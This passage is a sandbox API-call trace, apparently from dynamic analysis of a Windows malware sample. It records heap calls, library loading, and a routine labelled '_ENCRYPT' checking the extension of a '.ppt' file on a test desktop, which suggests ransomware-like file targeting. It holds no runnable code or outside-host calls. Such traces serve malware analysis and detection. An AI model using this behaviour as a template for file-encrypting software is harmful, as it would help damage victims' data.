lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.216] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690930 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76af28 [0075.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76af28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.217] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0075.217] CloseHandle (hObject=0x128) returned 1 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.217] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.218] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.218] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.218] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.219] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.219] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.219] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.219] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.219] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.219] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x699838 [0075.219] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0075.219] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.220] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x37bccaf0, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x0, dwReserved1=0x657690, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 0x6b89b8 [0075.220] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.220] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.220] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0075.220] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d1bc810, ftCreationTime.dwHighDateTime=0x1d5e129, ftLastAccessTime.dwLowDateTime=0x37bccaf0, ftLastAccessTime.dwHighDateTime=0x1d5e705, ftLastWriteTime.dwLowDateTime=0x37bccaf0, ftLastWriteTime.dwHighDateTime=0x1d5e705, nFileSizeHigh=0x0, nFileSizeLow=0x1267f, dwReserved0=0x0, dwReserved1=0x657690, cFileName="dU_Aud-fZ3ji9.ppt", cAlternateFileName="DU_AUD~1.PPT")) returned 0x6b89b8 [0075.220] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.220] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.221] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690940 [0075.221] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.221] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0075.221] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0075.221] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9728 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.221] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\dU_Aud-fZ3ji9.ppt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.222] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 